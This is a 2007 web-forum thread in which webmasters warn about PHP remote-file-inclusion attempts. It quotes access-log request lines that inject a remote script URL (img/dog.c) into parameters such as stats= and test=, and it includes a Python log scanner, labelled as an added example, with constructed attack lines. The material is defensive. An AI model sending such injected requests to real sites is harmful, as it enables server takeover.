
A site hosting hack-scripts

An IP address to guard against, PHP holes to close


AlexK

2:58 pm on Apr 10, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I do not want to promote scripts that (may be able to) hack PHP sites, but I *do* think that PHP writers will want to be warned of IP-addresses to watch out for that are hosting such scripts. The actual script-name in the following extract from my site's access_log has therefore been obscured:

192.168.1.1 - - [09/Apr/2007:12:37:44 +0100] "GET help/test.php?stats=http: //xx.#*$!.#*$!.#*$!/img/script.obscured? HTTP/1.1" 404 18 "-" "libwww-perl/5.64" In:- Out:-:-pct.

(It is a root-kit script, employing both PHP and JavaScript within an HTML wrapper)

The very best advice, of course, is to make sure that your scripts are not vulnerable to such exploits.

[edited by: eelixduppy at 9:05 pm (utc) on April 10, 2007]
[edit reason] obfuscated IPs [/edit]

AlexK

12:47 am on Apr 11, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Hmm. Well, if the mods cannot allow *any* IP, and to try and give something for folks to search their logs for, here is the access_log entry with the IPs obscured instead:

<access-IP-obscured> - - [09/Apr/2007:12:37:44 +0100] "GET /help/test.php?stats=http://<root-kit-IP-obscured>/img/dog.c? HTTP/1.1" 404 18 "-" "libwww-perl/5.64" In:- Out:-:-pct.

If you have command-line access, the following will pick out all access-lines:

    fgrep "img/dog.c" access_log | less

Other variants used on the above are:

    GET /help/test.php?test=http:...
    GET /help/test.php?help=http:...
    GET /help/index.php?null=http:...
    GET /help/test.php?a=http:...
    GET /help/test.php?from=http:...
    GET /help/test.php?action=http:

I've had 11 different IPs attempting this hack between 09/Apr/2007:12:37:44 and 10/Apr/2007:12:25:38. The <root-kit-IP-obscured> is identical in all cases. From the lang in dog.c it is written by a Brazilian hacker. If you need the IP, there is an entry within my own Forums ("Site Info & Diary").

HTH.
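A log check in the spirit of the fgrep command above, as an added example that is not from the thread or its posters: it parses combined-format access_log lines and flags any request whose query-string value is itself an absolute URL (the remote-file-inclusion pattern behind test.php?stats=http://...), so it catches every parameter-name variant listed above, not just the ones already seen. The sample lines, IP addresses and response codes are constructed; the function and field names are my own.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access_log lines modelled on the thread's entry; all IPs are
# documentation-range placeholders, not the addresses from the thread.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Apr/2007:12:37:44 +0100] "GET /help/test.php?stats=http://198.51.100.9/img/dog.c? HTTP/1.1" 404 18 "-" "libwww-perl/5.64"
203.0.113.6 - - [09/Apr/2007:13:02:10 +0100] "GET /help/index.php?null=http://198.51.100.9/img/dog.c? HTTP/1.1" 200 512 "-" "libwww-perl/5.64"
203.0.113.7 - - [10/Apr/2007:12:25:38 +0100] "GET /help/test.php?action=http://198.51.100.9/img/dog.c? HTTP/1.1" 404 18 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Apr/2007:12:26:00 +0100] "GET /help/test.php?stats=2007 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Apr/2007:12:27:00 +0100] "GET /gallery.php?img=HTTPS://203.0.113.77/r.jpg HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"')
# The RFI signature: a query-string value that is itself an absolute URL.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return one record per request whose query value points at a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        parts = urlsplit(m.group('target'))
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append(dict(client=m.group('host'), time=m.group('time'),
                                 script=parts.path, param=param, status=int(m.group('status')),
                                 payload_host=urlsplit(value).hostname, agent=m.group('agent')))
    return hits


def summarise(hits):
    """Tally payload hosts and user agents; any hit answered with 200 deserves a closer look."""
    return {'payload_hosts': Counter(h['payload_host'] for h in hits),
            'agents': Counter(h['agent'] for h in hits),
            'served_200': [h for h in hits if h['status'] == 200]}


if __name__ == '__main__':
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(h['time'], h['client'], h['script'], h['param'], '->', h['payload_host'], h['status'], h['agent'])
    print(summarise(found))
```

A 404 means the target script was not even there; a hit that was served with 200 is the one to follow up on the server itself.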

AlexK

3:54 pm on Apr 11, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I've just thought of something else practical that folks can do to check out their server.

The hack-script (if successful, of course) would have attempted to drop a file onto the server. The file to locate is:

    shmop.so
    or
    shmop.dll
(I am less sure of the name of the second one, as it was aimed at Windows servers, so did not apply to myself. It was definitely a `.dll', but may have been a slightly different name.)

coopster

1:48 am on Apr 14, 2007 (gmt 0)

WebmasterWorld Administrator 10+ Year Member



It's funny, I have my pc locked down so tight I cannot even retrieve the source code without my tools throwing it into quarantine. I'm not so sure I want to let the guard down long enough to investigate the code ;)

What did you discover about the file?

Also, did you happen to check out the browser vulnerability [webmasterworld.com] I recently posted?

AlexK

5:23 am on Apr 14, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



coopster:
What did you discover about the file?

The file is no longer on my PC, and I did not spend more than 30 secs or so glancing through the code (I am more sensitive to the intention of what is said or written than the meat 'n' veg of it; looking at this code caused me deep repulsion, very similar to the feelings in the stomach that you get when smelling fresh vomit) so please bear all that in mind in what follows.

In spite of the name of the source-file (dog.c), what comes down is a very standard HTML page (either 4.01, or possibly xhtml transitional). There are PHP statements embedded, and a very large slab of Javascript. It seeks to either drop some more files from the same IP on the server (browser computer?) or, if already present, make use of them. I did notice that it was designed to discriminate between Linux and Windows machines. My best guess (only 30 secs remember) was key-logging or some such.

phparion

7:26 am on Apr 14, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Recently one of our sites, based on WordPress, was attacked by a virus and a block of strange JavaScript was added to all HTML pages.

I am wondering if it was also attacked by this hack-script? I have a VPS; how can I check it?

thanks

AlexK

12:38 pm on Apr 14, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



phparion:
I have a VPS how can I check it?

Search through the access_logs for the text-string "img/dog.c" (no quotes). Also, check out msg#3308500 above.

If you want to find the IP on my site forums, look for "<IP-Number> blocked at the Firewall".

DanA

1:01 pm on Apr 14, 2007 (gmt 0)

10+ Year Member



I have between 10 and 300 hacking attempts a day on one site from hundreds of different IPs. The user agent is mostly libwww-perl/5.#*$! or Mozilla/5.0. The scripts are mostly located in hidden directories of hundreds of sites.
The names of the scripts are numerous (mostly php and perl scripts): dog.c, sweet.c, muerte.htm, cmd.txt, include.gif, r.jpg, list.txt, cmd.gif and so on.
At the moment, 60 page names with 100 variables have been requested.